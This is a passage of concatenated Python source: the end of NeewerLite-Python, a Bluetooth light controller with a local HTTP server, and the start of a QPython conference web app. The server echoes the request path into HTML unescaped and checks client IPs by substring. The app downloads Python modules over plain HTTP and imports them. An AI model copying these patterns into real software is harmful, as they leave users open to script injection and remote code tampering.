listToProcess[a] = "--on"
elif listToProcess[a] == "--link":
listToProcess[a] = "--link=-1"
# PARSE THE ARGUMENT LIST FOR CUSTOM PARAMETERS
parser = argparse.ArgumentParser()
parser.add_argument("--list", action="store_true", help="Scan for nearby Neewer lights and list them on the CLI") # list the currently available lights
parser.add_argument("--http", action="store_true", help="Use an HTTP server to send commands to Neewer lights using a web browser")
parser.add_argument("--silent", action="store_false", help="Don't show any debug information in the console")
parser.add_argument("--cli", action="store_false", help="Don't show the GUI at all, just send command to one light and quit")
# HTML SERVER SPECIFIC PARAMETERS
if inStartupMode == False:
parser.add_argument("--discover", action="store_true") # tell the HTTP server to search for newly added lights
parser.add_argument("--link", default=-1) # link a specific light to NeewerPython-Lite
parser.add_argument("--on", action="store_true", help="Turn the light on")
parser.add_argument("--off", action="store_true", help="Turn the light off")
parser.add_argument("--light", default="", help="The MAC Address (XX:XX:XX:XX:XX:XX) of the light you want to send a command to or ALL to find and control all lights (only valid when also using --cli switch)")
parser.add_argument("--mode", default="CCT", help="[DEFAULT: CCT] The current control mode - options are HSI, CCT and either ANM or SCENE")
parser.add_argument("--temp", "--temperature", default="56", help="[DEFAULT: 56(00)K] (CCT mode) - the color temperature (3200K+) to set the light to")
parser.add_argument("--hue", default="240", help="[DEFAULT: 240] (HSI mode) - the hue (0-360 degrees) to set the light to")
parser.add_argument("--sat", "--saturation", default="100", help="[DEFAULT: 100] (HSI mode) The saturation (how vibrant the color is) to set the light to")
parser.add_argument("--bri", "--brightness", "--intensity", default="100", help="[DEFAULT: 100] (CCT/HSI/ANM mode) The brightness (intensity) to set the light to")
parser.add_argument("--scene", "--animation", default="1", help="[DEFAULT: 1] (ANM or SCENE mode) The animation (1-9) to use in Scene mode")
args = parser.parse_args(listToProcess)
if args.silent == True:
if inStartupMode == True:
if args.list != True: # if we're not looking for lights using --list, then print line
printDebugString("Starting program with command-line arguments")
else:
printDebugString("Processing HTTP arguments")
args.cli = False # we're running the CLI, so don't initialize the GUI
args.silent = printDebug # we're not changing the silent flag, pass on the current printDebug setting
if args.http == True:
return ["HTTP", args.silent] # special mode - don't do any other mode/color/etc. processing, just jump into running the HTML server
if inStartupMode == False:
# HTTP specific parameter returns!
if args.list == True:
return["list"] # list the currently available lights
if args.discover == True:
return["discover"] # discover new lights
if args.link != -1:
return["link", args.link] # return the value defined by the parameter
else:
# If we request "LIST" from the CLI, then return a CLI list of lights available
if args.list == True:
return["LIST", False]
# CHECK TO SEE IF THE LIGHT SHOULD BE TURNED OFF
if args.on == True: # we want to turn the light on
return [args.cli, args.silent, args.light, "ON"]
elif args.off == True: # we want to turn the light off
return [args.cli, args.silent, args.light, "OFF"]
# IF THE LIGHT ISN'T BEING TURNED OFF, CHECK TO SEE IF MODES ARE BEING SET
if args.mode.lower() == "hsi":
return [args.cli, args.silent, args.light, "HSI",
testValid("hue", args.hue, 240, 0, 360),
testValid("sat", args.sat, 100, 0, 100),
testValid("bri", args.bri, 100, 0, 100)]
elif args.mode.lower() in ("anm", "scene"):
return [args.cli, args.silent, args.light, "ANM",
testValid("scene", args.scene, 1, 1, 9),
testValid("bri", args.bri, 100, 0, 100)]
else: # we've either asked for CCT mode, or gave an invalid mode name
if args.mode.lower() != "cct": # if we're not actually asking for CCT mode, display error message
printDebugString(" >> Improper mode selected with --mode command - valid entries are")
printDebugString(" >> CCT, HSI or either ANM or SCENE, so rolling back to CCT mode.")
# RETURN CCT MODE PARAMETERS IN CCT/ALL OTHER CASES
return [args.cli, args.silent, args.light, "CCT",
testValid("temp", args.temp, 56, 32, 85),
testValid("bri", args.bri, 100, 0, 100)]
def processHTMLCommands(paramsList, loop):
global threadAction
if threadAction == "": # if we're not already processing info in another thread
threadAction = "HTTP"
if len(paramsList) != 0:
if paramsList[0] == "discover": # we asked to discover new lights
loop.run_until_complete(findDevices()) # find the lights available to control
# try to connect to each light
for a in range(len(availableLights)):
loop.run_until_complete(connectToLight(a, False))
elif paramsList[0] == "link": # we asked to connect to a specific light
selectedLights = returnLightIndexesFromMacAddress(paramsList[1])
if len(selectedLights) > 0:
for a in range(len(selectedLights)):
loop.run_until_complete(connectToLight(selectedLights[a], False))
else: # we want to write a value to a specific light
if paramsList[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=paramsList[3], temp=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=paramsList[3], HSI_H=paramsList[4], HSI_S=paramsList[5], HSI_I=paramsList[6])
elif paramsList[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=paramsList[3], animation=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "ON": # turn the light(s) on
setPowerBytestring("ON")
elif paramsList[3] == "OFF": # turn the light(s) off
setPowerBytestring("OFF")
selectedLights = returnLightIndexesFromMacAddress(paramsList[2])
if len(selectedLights) > 0:
loop.run_until_complete(writeToLight(selectedLights, False))
threadAction = "" # clear the thread variable
else:
printDebugString("The HTTP Server requested an action, but we're already working on one. Please wait...")
def returnLightIndexesFromMacAddress(addresses):
addressesToCheck = addresses.split(";")
foundIndexes = [] # the list of indexes for the lights you specified
for a in range(len(addressesToCheck)):
try: # if the specified light is just an index, then return the light you asked for
currentLight = int(addressesToCheck[a]) - 1 # check to see if the current light can be converted to an integer
# if the above succeeds, make sure that the index returned is a valid light index
if currentLight < 0 or currentLight > len(availableLights):
currentLight = -1 # if the index is less than 0, or higher than the last available light, then... nada
except ValueError: # we're most likely asking for a MAC address instead of an integer index
currentLight = -1
for b in range(len(availableLights)):
if addressesToCheck[a].upper() == availableLights[b][0].address.upper(): # if the MAC address specified matches the current light
currentLight = b
break
if currentLight != -1: # the found light index is valid
foundIndexes.append(currentLight) # add the found index to the list of indexes
return foundIndexes
class NLPythonServer(BaseHTTPRequestHandler):
loop = asyncio.get_event_loop()
def _send_cors_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-Methods", "GET, OPTIONS")
def do_OPTIONS(self):
self.send_response(200)
self._send_cors_headers()
self.end_headers()
def do_GET(self):
if self.path == "/favicon.ico": # if favicon.ico is specified, then send a 404 error and stop processing
try:
self.send_error(404)
except ConnectionAbortedError:
printDebugString("Could not serve the error page, the HTTP server is already busy with another request.")
return
else:
# CHECK THE LENGTH OF THE URL REQUEST AND SEE IF IT'S TOO LONG
if len(self.path) > 159: # INCREASED LENGTH DUE TO ADDITION OF doAction IN THE URL
# THE LAST REQUEST WAS WAY TOO LONG, SO QUICKLY RENDER AN ERROR PAGE AND RETURN FROM THE HTTP RENDERER
writeHTMLSections(self, "header")
writeHTMLSections(self, "errorHelp", "The last request you provided was too long! The NeewerLite-Python HTTP server can only accept URL commands less than 132 characters long after /NeewerLite-Python/doAction?.")
writeHTMLSections(self, "footer")
return
# CHECK TO SEE IF THE IP REQUESTING ACCESS IS IN THE LIST OF "acceptableIPs"
# This is the list of local IPs that the server lets through (outside requests return "Forbidden"
# unless you specify that IP address or range - wildcards are just not typed in (192.168 is the same as 192.168.*.*) - in this list)
# The list currently contains a wildcard of internal router IPs (192.168.*.*, 10.0.0.*, 127.20.*.*) and the loopback IP (127.0.0.1)
# but any outside requests (unless you whitelist it below) will be forbidden from making a request
acceptableIPs = ["192.168", "10.0.0", "172.20", "127.0.0.1"]
clientIP = self.client_address[0] # the IP address of the machine making the request
acceptedIP = False
for check in range(len(acceptableIPs)): # check all the "accepted" IP addresses against the current requesting IP
if acceptedIP != True: # if we haven't found the IP in the accepted list, then keep checking
if acceptableIPs[check] in clientIP:
acceptedIP = True # if we're good to go, then we can just move on
# IF THE IP MAKING THE REQUEST IS NOT IN THE LIST OF APPROVED ADDRESSES, THEN RETURN A "FORBIDDEN" ERROR
if acceptedIP == False:
self.send_error(403, "The IP of the device you're making the request from (" + clientIP + ") has to be in the list of accepted IP addresses in order to use the NeewerLite-Python HTTP Server, any outside addresses will generate this Forbidden error. To use this device with NeewerLite-Python, add its IP address (or range of IP addresses) to the list of acceptable IPs")
return
acceptableURL = "/NeewerLite-Python/doAction?"
if not acceptableURL in self.path: # if we ask for something that's not the main directory, then redirect to the main error page
self.send_response(302)
self.send_header('Location', acceptableURL)
self.end_headers()
return
else: # if the URL contains "/NeewerLite-Python/doAction?" then it's a valid URL
writeHTMLSections(self, "header")
# BREAK THE URL INTO USABLE PARAMTERS
paramsList = self.path.replace(acceptableURL, "").split("&") # split the included params into a list
paramsList = processCommands(paramsList) # process the commands returned from the HTTP parameters
if len(paramsList) == 0: # if we have no valid parameters, then say that in the error report
writeHTMLSections(self, "errorHelp", "You didn't provide any valid parameters in the last URL. To send multiple parameters to NeewerLite-Python, separate each one with a & character.")
else:
self.wfile.write(bytes("<h1>Request Successful!</h1>", "utf-8"))
self.wfile.write(bytes("Last Request: <em>" + self.path + "</em><br>", "utf-8"))
self.wfile.write(bytes("From IP: <em>" + clientIP + "</em><br><br>", "utf-8"))
if paramsList[0] != "list":
self.wfile.write(bytes("Provided Parameters:<br>", "utf-8"))
if len(paramsList) <= 2:
for a in range(len(paramsList)):
self.wfile.write(bytes(" " + str(paramsList[a]) + "<br>", "utf-8"))
else:
self.wfile.write(bytes(" Light(s) to connect to: " + str(paramsList[2]) + "<br>", "utf-8"))
self.wfile.write(bytes(" Mode: " + str(paramsList[3]) + "<br>", "utf-8"))
if paramsList[3] == "CCT":
self.wfile.write(bytes(" Color Temperature: " + str(paramsList[4]) + "00K<br>", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<br>", "utf-8"))
elif paramsList[3] == "HSI":
self.wfile.write(bytes(" Hue: " + str(paramsList[4]) + "<br>", "utf-8"))
self.wfile.write(bytes(" Saturation: " + str(paramsList[5]) + "<br>", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[6]) + "<br>", "utf-8"))
elif paramsList[3] == "ANM" or paramsList[3] == "SCENE":
self.wfile.write(bytes(" Animation Scene: " + str(paramsList[4]) + "<br>", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<br>", "utf-8"))
# PROCESS THE HTML COMMANDS IN ANOTHER THREAD
htmlProcessThread = threading.Thread(target=processHTMLCommands, args=(paramsList, loop), name="htmlProcessThread")
htmlProcessThread.start()
else: # build the list of lights to display in the browser
totalLights = len(availableLights)
if totalLights == 0: # there are no lights available to you at the moment!
self.wfile.write(bytes("NeewerLite-Python is not currently set up with any Neewer lights. To discover new lights, <a href=""doAction?discover"">click here</a>.<br>", "utf-8"))
else:
self.wfile.write(bytes("List of available Neewer lights:<HR>", "utf-8"))
self.wfile.write(bytes("<TABLE WIDTH=""98%"" BORDER=""1"">", "utf-8"))
self.wfile.write(bytes("<TR>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:2%;text-align:left"">ID #", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:20%;text-align:left"">Custom Name</TH>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:20%;text-align:left"">Light Type</TH>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:15%;text-align:left"">MAC Address/GUID</TH>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:5%;text-align:left"">RSSI</TH>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:5%;text-align:left"">Linked</TH>", "utf-8"))
self.wfile.write(bytes("<TH STYLE=""width:33%;text-align:left"">Last Sent Value</TH>", "utf-8"))
self.wfile.write(bytes("</TR>", "utf-8"))
for a in range(totalLights):
self.wfile.write(bytes("<TR>", "utf-8"))
self.wfile.write(bytes("<TD>" + str(a + 1) + "</TD>", "utf-8")) # light ID #
self.wfile.write(bytes("<TD>" + availableLights[a][2] + "</TD>", "utf-8")) # light custom name
self.wfile.write(bytes("<TD>" + availableLights[a][0].name + "</TD>", "utf-8")) # light type
self.wfile.write(bytes("<TD>" + availableLights[a][0].address + "</TD>", "utf-8")) # light MAC address
self.wfile.write(bytes("<TD>" + str(availableLights[a][0].rssi) + " dbM</TD>", "utf-8")) # light RSSI (signal quality)
try:
if availableLights[a][1].is_connected:
self.wfile.write(bytes("<TD>" + "Yes" + "</TD>", "utf-8")) # is the light linked?
else:
self.wfile.write(bytes("<TD>" + "<A HREF=link=" + str(a + 1) + ">No</A></TD>", "utf-8")) # is the light linked?
except Exception as e:
self.wfile.write(bytes("<TD>" + "<A HREF=link=" + str(a + 1) + ">Nope!</A></TD>", "utf-8")) # is the light linked?
self.wfile.write(bytes("<TD>" + updateStatus(False, availableLights[a][3]) + "</TD>", "utf-8")) # the last sent value to the light
self.wfile.write(bytes("</TR>", "utf-8"))
self.wfile.write(bytes("</TABLE>", "utf-8"))
writeHTMLSections(self, "footer") # add the footer to the bottom of the page
def writeHTMLSections(self, theSection, errorMsg = ""):
if theSection == "header":
self.send_response(200)
self._send_cors_headers()
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("<html><head><title>NeewerLite-Python HTTP Server</title></head>", "utf-8"))
self.wfile.write(bytes("<body>", "utf-8"))
elif theSection == "errorHelp":
self.wfile.write(bytes("<h1>Invalid request!</h1>", "utf-8"))
self.wfile.write(bytes("Last Request: <em>" + self.path + "</em><br>", "utf-8"))
self.wfile.write(bytes(errorMsg + "<br><br>", "utf-8"))
self.wfile.write(bytes("Valid parameters to use -<br>", "utf-8"))
self.wfile.write(bytes("<strong>list</strong> - list the current lights NeewerPython-Lite has available to it<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?list</em><br>", "utf-8"))
self.wfile.write(bytes("<strong>discover</strong> - tell NeewerLite-Python to scan for new lights<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?discover</em><br>", "utf-8"))
self.wfile.write(bytes("<strong>link=</strong> - (value: <em>index of light to link to</em>) manually link to a specific light - you can specify multiple lights with semicolons (so link=1;2 would try to link to both lights 1 and 2)<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?link=1</em><br>", "utf-8"))
self.wfile.write(bytes("<strong>light=</strong> - the MAC address (or current index of the light) you want to send a command to - you can specify multiple lights with semicolons (so light=1;2 would send a command to both lights 1 and 2)<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66</em><br>", "utf-8"))
self.wfile.write(bytes("<strong>mode=</strong> - the mode (value: <em>HSI, CCT, and either ANM or SCENE</em>) - the color mode to switch the light to<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?mode=CCT</em><br>", "utf-8"))
self.wfile.write(bytes("(CCT mode only) <strong>temp=</strong> or <strong>temperature=</strong> - (value: <em>3200 to 8500</em>) the color temperature in CCT mode to set the light to<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?temp=5200</em><br>", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <strong>hue=</strong> - (value: <em>0 to 360</em>) the hue value in HSI mode to set the light to<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?hue=240</em><br>", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <strong>sat=</strong> or <strong>saturation=</strong> - (value: <em>0 to 100</em>) the color saturation value in HSI mode to set the light to<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?sat=65</em><br>", "utf-8"))
self.wfile.write(bytes("(ANM/SCENE mode only) <strong>scene=</strong> - (value: <em>1 to 9</em>) which animation (scene) to switch the light to<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?scene=3</em><br>", "utf-8"))
self.wfile.write(bytes("(CCT/HSI/ANM modes) <strong>bri=</strong>, <strong>brightness=</strong> or <strong>intensity=</strong> - (value: <em>0 to 100</em>) how bright you want the light<br>", "utf-8"))
self.wfile.write(bytes(" Example: <em>http://(server address)/NeewerLite-Python/doAction?brightness=80</em><br>", "utf-8"))
self.wfile.write(bytes("<br><br>More examples -<br>", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <em>11:22:33:44:55:66</em> to <em>CCT</em> mode, with a color temperature of <em>5200</em> and brightness of <em>40</em><br>", "utf-8"))
self.wfile.write(bytes(" <em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=CCT&temp=5200&bri=40</em><br><br>", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <em>11:22:33:44:55:66</em> to <em>HSI</em> mode, with a hue of <em>70</em>, saturation of <em>50</em> and brightness of <em>10</em><br>", "utf-8"))
self.wfile.write(bytes(" <em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=HSI&hue=70&sat=50&bri=10</em><br><br>", "utf-8"))
self.wfile.write(bytes(" Set the first light available to <em>SCENE</em> mode, using the <em>first</em> animation and brightness of <em>55</em><br>", "utf-8"))
self.wfile.write(bytes(" <em>http://(server address)/NeewerLite-Python/doAction?light=1&mode=SCENE&scene=1&bri=55</em><br>", "utf-8"))
elif theSection == "footer":
footerLinks = "Shortcut links: "
footerLinks = footerLinks + "<A HREF=""doAction?discover"">Scan for New Lights</A> | "
footerLinks = footerLinks + "<A HREF=""doAction?list"">List Currently Available Lights</A>"
self.wfile.write(bytes("<HR>" + footerLinks + "<br>", "utf-8"))
self.wfile.write(bytes("<A HREF=""https://github.com/taburineagle/NeewerLite-Python/"">NeewerLite-Python 0.6b</A> by Zach Glenwright<br>", "utf-8"))
self.wfile.write(bytes("</body></html>", "utf-8"))
def formatStringForConsole(theString, maxLength):
if theString == "-": # return a header divider if the string is "="
return "-" * maxLength
else:
if len(theString) == maxLength: # if the string is the max length, then just return the string
return theString
if len(theString) < maxLength: # if the string fits in the max length, then add spaces to pad it out
return theString + " " * (maxLength - len(theString))
else: # truncate the string, it's too long
return theString[0:maxLength - 4] + " ..."
if __name__ == '__main__':
loop = asyncio.get_event_loop() # get the current asyncio loop
cmdReturn = [True] # initially set to show the GUI interface over the CLI interface
if len(sys.argv) > 1: # if we have more than 1 argument on the command line (the script itself is argument 1), then process switches
cmdReturn = processCommands()
printDebug = cmdReturn[1] # if we use the --quiet option, then don't show debug strings in the console
# START HTTP SERVER HERE AND SIT IN THIS LOOP UNTIL THE END
if cmdReturn[0] == "HTTP":
webServer = ThreadingHTTPServer(("", 8080), NLPythonServer)
try:
printDebugString("Starting the HTTP Server on Port 8080...")
printDebugString("-------------------------------------------------------------------------------------")
# start the HTTP server and wait for requests
webServer.serve_forever()
except KeyboardInterrupt:
pass
finally:
printDebugString("Stopping the HTTP Server...")
webServer.server_close()
# DISCONNECT FROM EACH LIGHT BEFORE FINISHING THE PROGRAM
for a in range (0, len(availableLights)):
printDebugString("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)")
loop.run_until_complete(disconnectFromLight(a)) # disconnect from each light, one at a time
printDebugString("Closing the program NOW")
sys.exit(0)
if cmdReturn[0] == "LIST":
print("NeewerLite-Python 0.6b by Zach Glenwright")
print("Searching for nearby Neewer lights...")
loop.run_until_complete(findDevices())
if len(availableLights) > 0:
print()
if len(availableLights) == 1: # we only found one
print("We found 1 Neewer light on the last search.")
else: # we found more than one
print("We found " + str(len(availableLights)) + " Neewer lights on the last search.")
print()
if platform.system() == "Darwin": # if we're on MacOS, then we display the GUID instead of the MAC address
addressCharsAllowed = 36 # GUID addresses are 36 characters long
addressString = "GUID (MacOS)"
else:
addressCharsAllowed = 17 # MAC addresses are 17 characters long
addressString = "MAC Address"
nameCharsAllowed = 79 - addressCharsAllowed # the remaining space is to display the light name
# PRINT THE HEADERS
print(formatStringForConsole("Custom Name (Light Type)", nameCharsAllowed) + \
" " + \
formatStringForConsole(addressString, addressCharsAllowed))
# PRINT THE SEPARATORS
print(formatStringForConsole("-", nameCharsAllowed) + " " + formatStringForConsole("-", addressCharsAllowed))
# PRINT THE LIGHTS
for a in range(len(availableLights)):
lightName = availableLights[a][2] + "(" + availableLights[a][0].name + ")"
print(formatStringForConsole(lightName, nameCharsAllowed) + " " + \
formatStringForConsole(availableLights[a][0].address, addressCharsAllowed))
print(formatStringForConsole(" > RSSI: " + str(availableLights[a][0].rssi) + "dBm", nameCharsAllowed))
else:
print("We did not find any Neewer lights on the last search.")
sys.exit(0) # show the list, then quit out to the command line
printDebugString(" > Launch GUI: " + str(cmdReturn[0]))
printDebugString(" > Show Debug Strings on Console: " + str(cmdReturn[1]))
printDebugString(" > Mode: " + cmdReturn[3])
if cmdReturn[3] == "CCT":
printDebugString(" > Color Temperature: " + str(cmdReturn[4]) + "00K")
printDebugString(" > Brightness: " + str(cmdReturn[5]))
elif cmdReturn[3] == "HSI":
printDebugString(" > Hue: " + str(cmdReturn[4]))
printDebugString(" > Saturation: " + str(cmdReturn[5]))
printDebugString(" > Brightness: " + str(cmdReturn[6]))
elif cmdReturn[3] == "ANM":
printDebugString(" > Scene: " + str(cmdReturn[4]))
printDebugString(" > Brightness: " + str(cmdReturn[5]))
if cmdReturn[0] == False: # if we're not showing the GUI, we need to specify a MAC address
if cmdReturn[2] != "":
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> MAC Address of light to send command to: " + cmdReturn[2].upper())
loop.run_until_complete(connectToOneLight(cmdReturn[2])) # get Bleak object linking to this specific light and getting custom prefs
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> You did not specify a light to send the command to - use the --light switch")
printDebugString(" > CLI >> and write either a MAC Address (XX:XX:XX:XX:XX:XX) to a Neewer light or")
printDebugString(" > CLI >> ALL to send to all available Neewer lights found by Bluetooth")
printDebugString("-------------------------------------------------------------------------------------")
if cmdReturn[0] == True: # launch the GUI with the command-line arguments
if importError == 0:
try: # try to load the GUI
app = QApplication(sys.argv)
mainWindow = MainWindow()
# SET UP GUI BASED ON COMMAND LINE ARGUMENTS
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # set up the GUI in CCT mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # set up the GUI in HSI mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], hue=cmdReturn[4], sat=cmdReturn[5], brightness=cmdReturn[6])
elif cmdReturn[3] == "ANM": # set up the GUI in ANM mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], scene=cmdReturn[4], brightness=cmdReturn[5])
mainWindow.show()
# START THE BACKGROUND THREAD
workerThread = threading.Thread(target=workerThread, args=(loop,), name="workerThread")
workerThread.start()
ret = app.exec_()
sys.exit( ret )
except NameError:
pass # same as above - we could not load the GUI, but we have already sorted error messages
else:
if importError == 1: # we can't load PySide2
print(" ===== CAN NOT FIND PYSIDE2 LIBRARY =====")
print(" You don't have the PySide2 Python library installed. If you're only running NeewerLite-Python from")
print(" a command-line (from a Raspberry Pi CLI for instance), or using the HTTP server, you don't need this package.")
print(" If you want to launch NeewerLite-Python with the GUI, you need to install the PySide2 package.")
print()
print(" To install PySide2, run either pip or pip3 from the command line:")
print(" pip install PySide2")
print(" pip3 install PySide2")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/PySide2/")
elif importError == 2: # we have PySide2, but can't load the GUI file itself for some reason
print(" ===== COULD NOT LOAD/FIND GUI FILE =====")
print(" If you don't need to use the GUI, you are fine going without the PySide2 pacakge.")
print(" but using NeewerLite-Python with the GUI requires the PySide2 library.")
print()
print(" If you have already installed the PySide2 library but are still getting this error message,")
print(" Make sure you have the ui_NeewerLightUI.py script in the same directory as NeewerLite-Python.py")
print(" If you don't know where that file is, redownload the NeewerLite-Python package from Github here:")
print(" https://github.com/taburineagle/NeewerLite-Python/")
sys.exit(1) # quit out, we can't run the program without PySide2 or the GUI (for the GUI version, at least)
else: # don't launch the GUI, send command to a light/lights and quit out
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=cmdReturn[3], HSI_H=cmdReturn[4], HSI_S=cmdReturn[5], HSI_I=cmdReturn[6])
elif cmdReturn[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=cmdReturn[3], animation=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "ON": # turn the light on
setPowerBytestring("ON")
elif cmdReturn[3] == "OFF": # turn the light off
setPowerBytestring("OFF")
if availableLights != []:
printDebugString(" > CLI >> Bytestring to send to light:" + updateStatus())
# CONNECT TO THE LIGHT AND SEND INFORMATION TO IT
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to connect to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(connectToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error connecting to light " + str(maxNumOfAttempts) + " times - quitting out")
sys.exit(1)
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to write to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(writeToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error writing to light " + str(maxNumOfAttempts) + " times - quitting out")
sys.exit(1)
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to disconnect from light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(disconnectFromLight(0))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error disconnecting from light " + str(maxNumOfAttempts) + " times - quitting out")
sys.exit(1)
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Calculated bytestring:" + updateStatus())
sys.exit(0) |
main.py | #-*-coding:utf-8-*-
#qpy:webapp:PyConChina2015
#qpy:drawer
#qpy://127.0.0.1:8080/
"""
PyConChina2015 App's sourcecode
@Author river
"""
from bottle import Bottle, ServerAdapter
from bottle import run, debug, route, error, static_file, template, redirect
import urllib2
import os
import json
#### 常量定义 #########
ASSETS = "/assets/"
ROOT = os.path.dirname(os.path.abspath(__file__))
#### 安装WebApp依赖包 ####
def _save_from_url(surl, dname):
jfile = ROOT+'/'+dname
if not os.path.exists(jfile):
try:
data = urllib2.urlopen(surl)
fd = open(jfile,'w')
content = data.read()
fd.write(content)
data.close()
fd.close()
except:
pass
else:
fd = open(jfile)
content =fd.read()
fd.close()
def _setup_webapp_denps():
_save_from_url('http://qpython.org/libs/jsonconv.py', 'jsonconv.py')
_save_from_url('http://qpython.org/libs/ordereddict.py', 'ordereddict.py')
#try:
_setup_webapp_denps()
#except:
#pass
from jsonconv import *
######### QPYTHON WEB SERVER ###############
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close()
print "# QWEBAPPEND"
######### BUILT-IN ROUTERS ###############
def __exit():
global server
server.stop()
def __ping():
return "ok"
def server_static(filepath):
return static_file(filepath, root=ROOT+'/assets')
########################################
PAGE_TEMP = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<meta name="description" content="">
<meta name="author" content="">
<script src="{{assets}}jquery.min.js"></script>
<link href="{{assets}}bootstrap.min.css" rel="stylesheet" />
<script src="{{assets}}bootstrap.min.js"></script>
<script language='javascript'>
$(document).ready(function(){
%s
});
</script>
<style>
.btn-info { background-color:#ffe052;border-color:#ffe052;color:black}
.placeholder { padding-top:10px;padding-bottom:10px }
.col-xs-6, .col-sm-4 { padding:10px }
ul{ list-style-type: none; margin:0px;padding:0px }
tbody tr th:first-child{ width:80px }
table.nolimit tbody tr th:first-child{ width:auto }
.tt { padding-left:10px; }
.float-right { float:right }
.float-left { float:left }
.center { text-align:center }
.p5 { padding:5px }
.circle {
width: 100%%;
height: 150px;
border-radius: 1px;
border-color: 1px solid #ddd;
border: solid 1px #ddd;
}
.circle-view {
background-color: #fdfdfd;
}
.circle-text {
padding: 15px 15px 15px 15px;
text-align: center;
font-size:18px;
}
</style>
</head>
<body>
%s
</body>
</html>
""".replace("{{assets}}",ASSETS)
def home():
JS = ""
CONTENT = """
<nav class="navbar-inverse" role="navigation" id="navigation" style="background:#f9f9f9;border-bottom:1px solid #eee">
<div class="container">
<ul>
<a class="navbar-brand" style='color: #000;font-size: 23px;font-weight: bold;padding:10px;margin-left:0px' href="#">
<img src="http://pyconcn.qiniucdn.com/zoomquiet/res/logo/150801-cnpycon-barnner-h80.png" height="32">
<span></span>
</a>
